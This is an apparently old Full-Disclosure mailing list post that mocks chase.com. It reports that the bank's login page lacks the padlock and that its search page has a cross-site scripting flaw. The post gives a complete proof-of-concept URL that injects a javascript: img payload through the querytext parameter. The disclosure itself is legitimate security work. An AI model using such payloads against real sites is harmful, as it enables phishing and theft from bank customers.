[Full-Disclosure] http://www.chase.com/ vulnerability

[http-equiv@excite.com]

Pathetic.

Since you can spoof the main log in site all security calls to 
check for the 'little' padlock icon to determine the site is 
real doesn't exist on it plus the site has cross-site scripting 
capabilities:

http://chase.com/inetSearch/index.jsp?
pageType=&q=f&sort=2&start=1&num=10&lr=&restrict=&gce=&siteID=&se
archoption=&querytext=%22%22%3E%3Cimg%20dynsrc=javascript:alert
()%3E

Best keep your money under your mattress.

-- 
http://www.malware.com